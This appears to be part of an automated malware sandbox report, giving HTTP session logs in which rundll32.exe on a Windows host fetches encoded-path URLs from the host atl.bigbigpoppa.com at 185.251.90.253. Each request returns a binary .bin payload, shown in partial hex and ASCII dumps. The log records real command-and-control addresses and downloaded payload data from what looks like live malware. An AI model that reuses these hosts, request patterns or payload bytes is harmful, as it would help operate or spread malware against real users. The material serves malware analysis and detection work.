                                                        Sep 10, 2021 09:57:01.419950962 CEST5849OUTGET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1
                                                        Cache-Control: no-cache
                                                        Connection: Keep-Alive
                                                        Pragma: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                        Host: atl.bigbigpoppa.com
                                                        Sep 10, 2021 09:57:01.881223917 CEST5851INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Fri, 10 Sep 2021 07:57:01 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 194718
                                                        Connection: close
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="613b0fcdd02ba.bin"
                                                        Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                        X-Content-Type-Options: nosniff
                                                        Data Raw: 76 74 cf a8 dc 9e a3 bd 80 c4 22 74 d6 90 04 f4 7c 4e 89 f9 f5 f6 c3 41 5b bd 9a c1 75 03 9e 3d 57 c7 97 06 3e 33 1a 75 cb d2 f3 9b 82 f7 12 da 1b 73 aa 9d 83 1c 06 cc d0 bb fa 6b fe fc 69 45 21 fd 77 4d e8 65 62 93 d4 4f 54 c0 7f 4b c0 e8 bd 0a da 21 85 09 52 e0 63 30 82 6b 84 0b a5 73 0e d8 b6 0a 2f f6 82 b8 db 3a 51 f5 d1 6c 17 f8 66 f5 63 27 a8 2c fe 79 31 d3 11 a2 68 ab eb bd c6 ca 96 b7 df 24 d9 bb eb 81 ee 0f 54 d0 24 37 17 2e bd d0 90 a9 1c c7 0d aa a5 e0 95 ad 52 e0 75 84 91 a6 10 9d 81 0a 4d b4 ff 81 97 74 92 63 92 3b ae a9 ad cf 50 57 12 53 8f 24 c5 3c d5 ff c4 5c 06 b9 e4 02 71 34 b3 6a f5 02 c6 06 6d 8c 5a b2 93 69 e3 04 8d c3 27 8a b8 c8 4a 1d cd c2 0f bd 3f 7e 06 be 38 ae a8 33 f4 46 25 b7 42 e8 60 df af 0a cb 9a 44 a1 2f 47 30 4b a6 62 22 1a 9b 17 41 04 1f fe a9 a5 c2 5f 2c b8 17 b3 7e f8 a3 b1 19 c2 e2 ac 4f 23 9a 3a 3a bf c4 61 f5 b6 7d d8 d5 41 f7 c6 7d 13 a3 25 bd bd b7 45 09 64 a8 d5 8a 6a 6e 18 90 f8 15 29 9d ad e6 f7 81 c6 c1 6d 32 c6 6d 91 e1 d5 b2 11 af d7 0f ae c5 84 22 1e 0f 3d 2a 0d 19 79 94 9f 72 e4 19 30 54 53 f8 a0 51 28 95 77 e8 05 cd 58 f3 5e 79 1b 2d 75 16 31 f4 ea 58 42 da fe ad 9f 21 09 f9 67 69 cf ff c7 a6 bd 34 2a ef 9a e2 63 bf 8b 7d 44 e0 80 ea 5d fb 18 21 db 02 cf db ca 07 81 b4 3e 7a 72 00 1b 21 ff 30 31 fa d2 ce c6 9f 33 9a cd 1a 25 3c f7 05 4d c2 77 5e 4f fc 99 c8 f0 51 93 7e e9 b2 35 93 c2 cc 3e bd 22 41 3e a6 14 a2 f9 47 45 a0 94 00 2b c8 09 2c 57 1c 70 d1 fc 8b 98 bd a9 53 f3 48 aa d4 87 c8 34 d1 84 66 95 bf 45 78 59 ad 24 31 f2 22 9f 83 2e 85 ee f9 50 21 68 9f ec 2e 0f 0a 37 cc a4 dc 12 79 1e 10 12 9d 19 93 bc cf 36 df 7c 6f 25 8f bc 3a 4c 53 73 0d ae 15 56 83 9e fa 88 d5 7f 9b ee e9 dc ff 92 38 f9 91 3c bf b0 a9 0d 4a 43 73 58 68 19 46 a8 b0 e3 17 3d 9c 68 30 37 f6 84 d2 c7 37 01 33 97 44 91 e5 20 3f a7 d9 e3 c0 af b0 2a 54 8f ef ab aa 06 35 5f 5b c2 66 54 41 fd bb d8 8a 29 80 3d 5d d0 8d 84 9f 53 68 db f0 5a 42 de 57 66 fa 72 b7 72 97 f3 0f 0d 65 28 85 1c 27 e4 ff f8 ed 8c 53 c2 a4 9a ad fe 7d c9 57 1e f2 ae f2 d6 35 08 89 64 bd 41 a1 00 d8 bb 74 05 14 0c 5e ca 85 87 26 07 a5 14 0f 34 11 c2 c5 18 a1 ed ce fd da 89 22 fb f0 a7 a2 50 4a 11 f6 48 c3 b2 8a f3 91 ca 09 4a d9 01 f7 fb 10 4d a4 ed cd 67 f7 fa bf df 33 2d 23 30 89 ba 79 e8 a3 8e 23 56 d9 30 2e 33 d2 7b 11 d1 09 3f 4a 40 d9 21 e7 c3 99 10 06 48 49 e6 26 34 2f c8 84 6f b9 66 4b 96 6e 4d 8a 42 85 99 f6 5f 76 29 de 4e c0 fb 1d 3a 19 52 46 73 7a 7f e9 46 b5 05 4b 3e 44 54 27 2b d1 39 05 34 e3 7e 5b e3 e8 52 d3 26 d5 f4 0e c9 1e 3e 6f 47 1f 11 ed 46 0f 00 f0 d5 53 bd 47 1f 3e ad 02 09 9b 96 3d ce 9d cc 58 7d 5e 62 8b 69 88 05 00 61 0d b0 69 2c da a1 ec e0 02 19 38 28 c5 c3 c1 00 80 82 e8 27 0d 0c 48 62 cf b4 e4 fb fa 1e 90 42 0e d8 9a 95 7b f2 ae 5f f6 77 d3 ea f5 b8 f3 4e 21 a0 bc 9b e0 df 6e 4c 75 0c 36
                                                        Data Ascii: vt"t|NA[u=W>3uskiE!wMebOTK!Rc0ks/:Qlfc',y1h$T$7.RuMtc;PWS$<\q4jmZi'J?~83F%B`D/G0Kb"A_,~O#::a}A}%Edjn)m2m"=*yr0TSQ(wX^y-u1XB!gi4*c}D]!>zr!013%<Mw^OQ~5>"A>GE+,WpSH4fExY$1".P!h.7y6|o%:LSsV8<JCsXhF=h0773D ?*T5_[fTA)=]ShZBWfrre('S}W5dAt^&4"PJHJMg3-#0y#V0.3{?J@!HI&4/ofKnMB_v)N:RFszFK>DT'+94~[R&>oGFSG>=X}^biai,8('HbB{_wN!nLu6
                                                        Sep 10, 2021 09:57:01.881283998 CEST5852INData Raw: 90 ae a9 f4 a8 ef be ce 22 ff 51 86 25 9b 45 49 f6 38 ab a0 17 81 da 96 40 7d 79 7c 81 b0 00 b6 32 cd 25 c7 b2 a3 9e e3 ed b9 d6 f1 15 6f 3e 2f c2 02 d6 80 08 1d fa e8 27 17 98 17 96 c4 37 0a 68 eb 2f ae b2 81 13 08 6b c6 f2 d0 8b 5f 7e 09 9a 08
                                                        Data Ascii: "Q%EI8@}y|2%o>/'7h/k_~0*wAZ]EC2 >3&{i+: |{65z"=*8TxOkt,GM)'Ju_cJ:`zyuE]\6UTO?UE_~'
                                                        Sep 10, 2021 09:57:01.881320000 CEST5853INData Raw: b8 c2 31 4b 94 90 26 a0 e4 26 12 84 c1 9b 09 25 61 fe a0 fd 91 bf a7 1a 26 94 b9 5b 6b 55 b4 f6 ea 62 0c c5 04 75 97 20 b2 b5 66 87 2f ca a7 92 60 2c 21 84 a7 23 e1 a8 fc f7 21 29 ac 5e c2 aa f8 41 99 f8 90 d7 e3 16 e1 88 2e d0 99 61 d2 30 f4 8f
                                                        Data Ascii: 1K&&%a&[kUbu f/`,!#!)^A.a0vS4O=U }2w`zuD~!SU~JA{7UZb@'VpGaDMWUZ)ypc4fH"LocY9L
                                                        Sep 10, 2021 09:57:01.881357908 CEST5855INData Raw: 8f 66 14 26 6f 0a 4c 7c 7d 3b 07 77 37 85 e5 2f eb 55 0a 37 fc 6c d5 08 f9 ca 66 39 c2 a8 e3 90 49 b9 2c 73 eb 2b f0 b0 b3 06 ac bb 49 5e 6d 49 ee fd c3 dd 83 df 48 eb fc 27 f5 1e f8 88 2c 14 1a d2 f4 9b 16 04 f1 33 a5 8b 28 c5 ed 91 ed 92 85 22
                                                        Data Ascii: f&oL|};w7/U7lf9I,s+I^mIH',3("5yoq9k'oHZ^f4)E{c#:3)UTJ[IrbhMjQYWFx&M]c<KeKD"+L]*h?R@#O.8
                                                        Sep 10, 2021 09:57:01.881395102 CEST5856INData Raw: f6 42 92 7c 54 91 1b dc b2 de d8 a3 dc d6 88 e3 9c 7c 48 e7 1d f1 4c c5 33 a3 de 0b 0a 7a e9 48 f4 64 75 e9 e3 5b 85 c6 a9 56 bb 6c 9e 03 c5 94 ba a5 f0 aa 2d fe c3 d8 ab 6b c9 be 75 48 5d ca f7 05 fc e7 84 a2 d8 39 fb b2 69 11 6b dc 9d 5a eb 4e
                                                        Data Ascii: B|T|HL3zHdu[Vl-kuH]9ikZNW2dpRbM*HI4uy>Yd6kr>3?^h2_ZyX#dJ>3+*Xz;/MQVR,)`K9usZDzR5a4iXYiu!
                                                        Sep 10, 2021 09:57:01.881441116 CEST5857INData Raw: 13 95 39 69 f7 3d 42 4d f2 85 6d 98 78 cd dd 3c dc 7b cc a6 dc 90 b4 bd 1a c9 1e 1a 9e ba 0f 08 85 83 71 08 ab 06 0c c0 db 07 19 ba 49 f5 13 bc 48 4f 9d cc 7b f3 3b 1e 78 fb 1a 99 c7 04 4b db 4d 65 07 b1 a8 89 d1 1d a7 b1 22 83 91 46 a3 eb 4b 09
                                                        Data Ascii: 9i=BMmx<{qIHO{;xKMe"FKd\wc|;HUQQ$@9!(JZE~d/E.*3ad#{u:DNj>yOh@ac"#8/Ub!"7yzvI['xC{HOsmZ+
                                                        Sep 10, 2021 09:57:01.881483078 CEST5859INData Raw: cb 76 37 ad af d4 4b 5f 3c ad 14 bf fa 70 87 21 e1 91 5a 60 f4 09 f0 76 51 e8 fd a1 65 fc 4c ee 32 94 36 e2 42 d4 1f 40 a9 2f 89 e6 8c 6e bf 1a 75 dc b0 f3 5f 45 79 97 ee 10 0b 25 d3 18 b2 d6 9b e7 87 c4 d5 5e 5a a3 ca 83 93 ff 86 d7 17 1c 8d 5d
                                                        Data Ascii: v7K_<p!Z`vQeL26B@/nu_Ey%^Z]y|f<xW50>sDE5R#6W,p^+T#@!3Y9V23C6_"00iMs>T6[BY/
                                                        Sep 10, 2021 09:57:01.881520033 CEST5860INData Raw: cb 27 c2 5e 54 d1 50 56 2e f1 f4 43 33 52 6d 04 fe c4 c5 6e d2 0f f2 79 96 89 84 7c 5d 04 88 6c 0a 58 ad 23 04 cf 77 2c 5b c9 b1 d0 03 99 9e b6 92 83 c5 dc 78 69 5c 88 43 5b 8b 94 46 c4 e5 3e e8 fc df 10 69 50 1b df 1c b4 6d 29 3d 65 42 b8 74 1e
                                                        Data Ascii: '^TPV.C3Rmny|]lX#w,[xi\C[F>iPm)=eBt ~rrpju(%bQV8aq"kOsAyBTTEP)tFoHG+k+;V'w%[`tVJoC6HFK(RoL
                                                        Sep 10, 2021 09:57:01.881557941 CEST5862INData Raw: ad fd 60 50 6d 82 ae 3e 9c 22 4e ae 89 42 bb 1d 0d d9 c6 3f 9c 1e 4f 33 a6 b6 97 01 38 8e 7b ee 7b a3 1f 28 19 55 0a e8 e1 1b e6 62 cc 6f a5 1a 7b 12 d0 c6 ed ac 84 5a d4 ea af c3 30 fb cb 52 e7 ed ec 65 de 00 ff 56 57 9d 95 f0 91 e8 38 0b d2 20
                                                        Data Ascii: `Pm>"NB?O38{{(Ubo{Z0ReVW8 x%MF# ocj(l0B=9T."Xcp2kI%`d.,C&-Ja!Mie'X)6$cN$l$t^9
                                                        Sep 10, 2021 09:57:01.881597042 CEST5863INData Raw: 90 18 dd 7e 29 1e f4 88 b7 57 2c e5 52 91 9b ae 93 09 61 24 b1 07 56 10 7d 3b 43 25 61 4b 35 4e 59 cd 10 3f 8d 49 ab 4c 7a 3e 9c a5 41 5a 39 d1 f2 5e 2a ff b2 68 bc 3f 81 f2 42 62 dd 33 6e cd ec 7e 9b 28 67 54 7d 27 ad b2 39 12 b5 7c 39 7f 6e 9c
                                                        Data Ascii: ~)W,Ra$V};C%aK5NY?ILz>AZ9^*h?Bb3n~(gT}'9|9nA6~E6]*ZGW(0Q2y*sm=KPG}OZIFAa;8'@>pKW2j{4/!gdv>Q)-;*
                                                        Sep 10, 2021 09:57:01.931186914 CEST5864INData Raw: 1a 24 f4 75 76 e8 bf fb 36 48 64 f4 f9 b4 63 aa 94 da 2e a0 34 29 56 b2 63 09 b3 b6 30 4e 1b e4 ad 9c ca e9 11 8e bb ab c6 b3 f3 b4 a3 21 b2 35 e4 16 29 c9 dd a7 74 52 44 cb c4 fe 43 ea b5 fa 91 a0 de aa 01 20 cb a8 9f 17 52 aa 5d 80 b3 1b 9f 6c
                                                        Data Ascii: $uv6Hdc.4)Vc0N!5)tRDC R]l&ATo!%-r<u:*5DNA@7V(E!fh;amzHA.qBOrjA=`n5:UJu=gLw^X% C1Bjck<o@6yu


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.549788185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 10, 2021 09:57:02.700382948 CEST6053OUTGET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1
                                                        Cache-Control: no-cache
                                                        Connection: Keep-Alive
                                                        Pragma: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                        Host: atl.bigbigpoppa.com
                                                        Sep 10, 2021 09:57:03.196911097 CEST6054INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Fri, 10 Sep 2021 07:57:03 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 247965
                                                        Connection: close
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="613b0fcf29415.bin"
                                                        Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                        X-Content-Type-Options: nosniff
                                                        Data Raw: df af 1f 2c c7 7a 76 2e c4 65 52 d8 c5 96 95 66 6a 34 f7 62 f3 c6 81 d9 07 0e bc 4f 56 08 9d 0e 1c 30 b4 bc 8a 54 30 49 14 87 4f 11 78 79 9f a5 a3 c1 f0 f2 71 2a ab 5d ad b6 19 fb 7b e5 e8 5b b1 62 55 09 08 fa c4 b5 12 c3 58 e0 61 dc 69 59 43 ce 7f 7f be b9 36 0f 6f 2d cb 03 0c d4 8d ae 5e 2a 57 59 70 5a c4 7f 2f 72 cd e3 ba d8 80 d9 b2 c2 8d 36 2b 7d ec 9a d1 b3 92 2d dc 89 30 84 5d 9f f1 67 43 50 67 cc 6a 54 29 3d d6 af a8 16 68 8b 15 cd 1d f4 eb 98 08 70 c8 a5 8a c3 af e2 e1 69 de 42 28 d0 e9 c8 68 6d 52 20 18 a9 57 02 5d 75 76 9a 12 b6 c4 3e 11 ce 5b da e7 66 f2 d6 01 98 15 84 59 bf 42 3a e6 5e dd 98 29 46 a9 d9 33 3a 8d 4f f4 ac 9c ba 0f 5a 3d 9b 82 78 38 73 e6 b5 cc fe 07 e1 cd 3d c3 bc bd 64 86 62 56 ad c9 8a 57 f7 4e 67 9c 19 37 56 46 21 d2 be ee 2a 75 32 18 f6 b7 17 1d 9f bb 4d 5f 52 cd 18 c5 8e 3c 94 fc 59 3b 5a bb af ad d5 e6 75 99 11 80 40 1a fa fd 9d 25 e5 7b f8 e3 92 5d 13 32 74 46 66 44 f4 f3 8e 21 47 18 9c 4c 91 b6 41 4b 4b f0 af 08 9e f3 4c 5a 25 fd 03 1e b2 09 8f 24 8f f6 be a3 52 9b c9 e9 0c 6a 62 9b 77 94 dc 2f 41 cd cc 76 66 e6 fc 0e 5e 3c 65 ba 6c a0 7b c9 40 af 6e ee 00 e7 c5 62 5e 5d d7 40 0e 9e c3 cb fb 58 34 6e 3e 7e ca 8a 3c d4 5b 01 fc 92 41 bc 19 55 5a 7a 2f 0d 15 e4 db e0 04 58 d9 17 09 24 0f a9 87 2a 33 ff 80 96 5e 10 c5 23 08 84 8b 27 d8 28 72 98 80 ed 0b c1 94 72 4e 1a 87 af 77 e2 f9 55 74 96 83 c4 50 e0 0e da b4 d5 27 2b e9 09 c7 ee e3 3f 06 68 a6 63 ab 09 16 3c 1e c7 a0 69 47 d9 36 00 08 83 b2 99 76 9f f6 8b 62 b1 d9 f4 c3 ed 59 1f 04 14 ef ea 3d 35 8e 61 6b 5f 69 f4 c1 5a 8a e1 c4 28 46 cf 23 fb a9 a8 b3 2e fc 57 52 94 15 c3 0a c3 12 34 b6 d8 a0 0b 1f c0 f2 12 4f 3d 45 b7 9d 3b cf c5 79 c6 be 37 15 1c 53 e5 dc 3e fc 42 e0 4e 9b 3e c4 e6 64 a3 74 23 83 d6 07 0c e1 6b 62 e1 6a a5 7e f7 ca 83 67 30 f8 8a cc c6 47 e6 8c d3 c5 6c 79 f6 f7 79 8b c2 a5 5c 6d 45 a3 37 8d d8 fc d8 99 ef 07 b0 9b 39 83 ff bc b0 6f 4e 5d f9 62 10 42 d6 c8 58 f9 f0 56 ac 6a 96 46 1d f0 6b bd f8 b2 82 69 29 9f a3 fa a7 f4 b5 96 17 09 74 01 5a 9b f5 e1 89 8a dd 96 5c 77 36 9b 1b fe 72 df 5e 6a 1a d5 ff 61 62 fd b1 ea 2d 89 fb d1 11 5c 30 cb ea 6e 42 2d 36 34 c8 a1 93 06 33 c5 8a 81 a6 4a de 57 53 65 11 e7 9c 9d ea 6e aa dc f9 0e 90 ec 29 c5 9f 4e 6b 47 01 13 61 05 77 55 a1 0e 96 ee 2a ed 63 85 62 93 f3 51 68 dd c4 79 b3 40 6f 8f e4 29 2e 5b 5b 31 95 9f 22 ed 22 00 05 35 fa b5 f2 91 73 fa 06 ca c4 85 6f ea 84 12 6f 1d cc e0 7a 7a 41 f5 16 df 63 f2 ce c2 cd 0d f2 fa 10 24 6a e1 e0 fb 5f 7f 4b 0c 50 5d 71 d6 63 38 66 6e f0 ea 85 52 52 f4 4e 32 da 21 a9 2a 30 1d 58 1f 70 0d af 01 71 28 de b7 26 ed 97 36 ca 6b 7e 0b c6 08 74 65 f1 77 c1 28 ab a4 6b 08 e7 fc 68 59 3e 8c 41 10 b0 98 01 4e 57 f8 11 ba 47 df 3d 97 d6 1e 49 e2 f4 66 c3 68 ae 75 3c 6b 70 74 9c 71 ff c1 59 88 e7 ac 4d c7 c5 19 5a 24 6c 08 13 7c d9
                                                        Data Ascii: ,zv.eRfj4bOV0T0IOxyq*]{[bUXaiYC6o-^*WYpZ/r6+}-0]gCPgjT)=hpiB(hmR W]uv>[fYB:^)F3:OZ=x8s=dbVWNg7VF!*u2M_R<Y;Zu@%{]2tFfD!GLAKKLZ%$Rjbw/Avf^<el{@nb^]@X4n>~<[AUZz/X$*3^#'(rrNwUtP'+?hc<iG6vbY=5ak_iZ(F#.WR4O=E;y7S>BN>dt#kbj~g0Glyy\mE79oN]bBXVjFki)tZ\w6r^jab-\0nB-643JWSen)NkGawU*cbQhy@o).[[1""5soozzAc$j_KP]qc8fnRRN2!*0Xpq(&6k~tew(khY>ANWG=Ifhu<kptqYMZ$l|
                                                        Sep 10, 2021 09:57:03.197005033 CEST6055INData Raw: f4 6e 6a 4e d0 ed f9 c2 d6 48 f6 5d a4 cd 88 a0 7d a4 7a 3c ca 11 a5 f8 58 b1 68 a1 84 53 16 ca 27 7d 6f 29 ca 7e 81 83 c1 46 b5 aa a1 98 ba e0 da ea 2f 8e 2b 13 dd a4 37 f1 c3 a6 e2 3a b8 ce 67 61 91 65 04 7c f6 0b fe 7c f3 8f 07 d6 b1 2c c6 9f
                                                        Data Ascii: njNH]}z<XhS'}o)~F/+7:gae||,zm~q[V3fmGRxDJ.R{:6ei^.(g`P=%-^|8.:#fd'k&]XPwgo&lay@z
                                                        Sep 10, 2021 09:57:03.197093964 CEST6057INData Raw: b3 98 00 21 bc 95 5e d5 6d af 05 fe 44 67 47 8d aa a4 76 3e d0 24 e5 20 03 d3 ba b9 03 81 b9 fe 67 13 51 e6 27 f0 8c fb c5 44 14 1f 6a c6 d4 c3 4b ab 43 50 c7 8c 1c fd 25 12 95 1b 09 04 07 92 42 2e 31 1c 8f 56 92 b2 95 b8 ed 7b 52 97 10 73 f3 23
                                                        Data Ascii: !^mDgGv>$ gQ'DjKCP%B.1V{Rs#S^l:Zf@YN2kISR2YiqM<&!#W`G@{T xeFX\ge _ja-hAAm}LPj5o}=*^1Uf
                                                        Sep 10, 2021 09:57:03.197191000 CEST6058INData Raw: 38 e9 6a 27 59 42 f3 5d 29 71 d1 dd da b0 01 0b ba 98 66 3b bf 97 2b 0a a4 e1 a8 c4 d9 0d 0b f9 b7 b5 96 2c c8 f1 c5 dc 59 e4 8d 04 46 a3 46 d7 90 10 52 30 11 4f f2 55 d3 89 b2 13 d6 f2 3c d3 50 f7 33 98 a4 e7 4a 22 b6 e4 3e 4d 06 f9 91 84 75 9f
                                                        Data Ascii: 8j'YB])qf;+,YFFR0OU<P3J">Mu280!5(JB@#!)2`e K-FqE-^@Wp-Ek,r.r"!PB?74Mg-Gk!yh(Y@*(\A
                                                        Sep 10, 2021 09:57:03.197249889 CEST6060INData Raw: d9 cf 09 aa b9 be 50 41 7f 12 41 b1 3b 7b fb d6 c2 20 34 8b 75 fa 03 bb 6a df 9a eb 06 22 75 37 a6 2b 68 e4 9e ed f4 61 83 6a ce 56 e6 2a 7c 7c 79 cc 7b b4 9f 18 2d b0 09 ed ee e0 58 d4 97 01 26 f0 c8 3a df 9a bb 7e 47 2c 41 e4 8e f1 fc ef 81 10
                                                        Data Ascii: PAA;{ 4uj"u7+hajV*||y{-X&:~G,A. gUAL6X|!_H||ry42xFS+}P}TF+w2_!([=ZrN>|u#='nl+1Q62[g0,oJ1fN)
                                                        Sep 10, 2021 09:57:03.197339058 CEST6061INData Raw: c8 4e 63 ee 60 a4 01 ce 13 37 95 97 5d 83 4e 99 3e cd 35 51 54 d4 c4 7c 03 1c 4c 85 b0 1b 36 64 4a e7 7e a3 9c 8a 8a c0 2e 3b 04 8a 1a 14 18 5e 08 72 8d dc 9b 9d 4c c6 b6 22 53 c0 8e b1 a4 0b 17 6a 10 25 23 fa 16 f8 37 26 d5 4d 72 5f e5 17 3a d9
                                                        Data Ascii: Nc`7]N>5QT|L6dJ~.;^rL"Sj%#7&Mr_:Z'TNst)L$&.MzG?e^lww8l&O\3A)Ve\af8DSuoU"6Hao"\"c\]2=\)
                                                        Sep 10, 2021 09:57:03.197405100 CEST6062INData Raw: f7 f7 58 28 cb 92 af a2 df bc 90 3a eb 10 51 5c a0 7a 44 73 66 72 5f b0 0e 8a ac 42 44 cc a9 cf 80 44 14 a0 ca 54 50 c2 b8 46 0e f4 af 2f d7 03 af df 30 b1 e2 59 af bb 77 e8 a3 cd cf 47 f2 ef 5a 47 1c 92 aa cd 94 7c 78 dd 5f 08 90 0f d4 3c ca 30
                                                        Data Ascii: X(:Q\zDsfr_BDDTPF/0YwGZG|x_<0'8XSsl|S{#0.6yb+@NVGo??(T>\0rX\2_ri$T<F!k1Z(GuT{j1P
                                                        Sep 10, 2021 09:57:03.197464943 CEST6064INData Raw: 73 cb 9e 03 f2 05 21 3d fe 3c b0 36 d1 07 15 a7 50 44 97 bd 2b 4c e4 77 21 90 b9 3a 39 2c 26 32 79 4b 86 02 b5 2a eb 06 ca 15 90 42 e0 6d 0c 70 03 38 54 50 b6 ff b2 fa 63 6e 76 a2 bf d2 9e 0c f4 96 e3 98 4f 57 fc 92 be 98 5c c7 27 88 53 d9 85 3a
                                                        Data Ascii: s!=<6PD+Lw!:9,&2yK*Bmp8TPcnvOW\'S:*R_=7.9)Z$OW2,$#,VkWPPVQB2@\l,Xp7iw :y/O=bT4_-%tLX>C/]i/p\pwfT
                                                        Sep 10, 2021 09:57:03.197540045 CEST6065INData Raw: 81 68 bd 15 46 05 e3 72 36 26 e3 a3 58 f9 9e 5c e7 5d 52 c1 e5 ea 8a 35 b9 4a 48 45 89 31 7a 06 21 42 92 dc b4 68 c8 5c 76 16 2e 40 02 71 55 be 9e 4a f7 a2 b4 db e2 a6 48 d7 0a f2 88 27 6b 0b 29 e1 4b 21 c4 5c 65 26 71 5b 07 0d a9 84 b6 c8 78 57
                                                        Data Ascii: hFr6&X\]R5JHE1z!Bh\v.@qUJH'k)K!\e&q[xW&Jw?auy&Ac'59AV##Iv)~ev{\H#w/N+ k9^?xV*npr=vR'e0'+R421W
                                                        Sep 10, 2021 09:57:03.197628021 CEST6066INData Raw: 09 d8 71 72 9d ff 25 bc e9 f6 f2 45 47 87 e5 96 c7 5a 82 05 3d 5d 08 53 0e 2b 51 bb 92 db da 21 15 38 a1 75 f5 64 a6 73 f0 11 e7 a0 56 af 82 3e b9 a8 ee 97 49 a9 9f fd 4b c7 53 56 83 94 1e 21 b4 1e e7 e7 37 01 3b 6d df fe 42 d1 f6 93 83 5c 52 64
                                                        Data Ascii: qr%EGZ=]S+Q!8udsV>IKSV!7;mB\Rd[i+E?u*msU4.Ay:Bd^eYhKlq=`{I#XqOXhM<Ne/b$wU<4LU4s]ZVuNzY
                                                        Sep 10, 2021 09:57:03.246896029 CEST6068INData Raw: 3c 47 62 fe b9 d6 6c 6b ef e1 b0 74 c8 2a 47 58 de ec 3e 8a 38 6d ed 47 8f 47 5b d7 06 62 d4 b4 3e b4 47 4f 91 49 6f da 46 7a 6a 15 18 a0 19 43 fe 97 51 cf 98 96 42 25 40 90 e9 27 4c 46 86 56 cf dc f7 a7 4d 4b d5 3d 85 02 a9 e6 46 a7 2b 89 03 69
                                                        Data Ascii: <Gblkt*GX>8mGG[b>GOIoFzjCQB%@'LFVMK=F+imR[H4kOQ]P(Z>)0Fl0%l}UmsM6,Gf@"e^-gB[:k[/uz2wL5,Rw_I'\>U$1_=r!7#/ozEMK=*aD>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.549789185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 10, 2021 09:57:03.803296089 CEST6310OUTGET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1
                                                        Cache-Control: no-cache
                                                        Connection: Keep-Alive
                                                        Pragma: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                        Host: atl.bigbigpoppa.com
                                                        Sep 10, 2021 09:57:04.265120983 CEST6312INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Fri, 10 Sep 2021 07:57:04 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 1958
                                                        Connection: close
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="613b0fd038f90.bin"
                                                        Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                        X-Content-Type-Options: nosniff
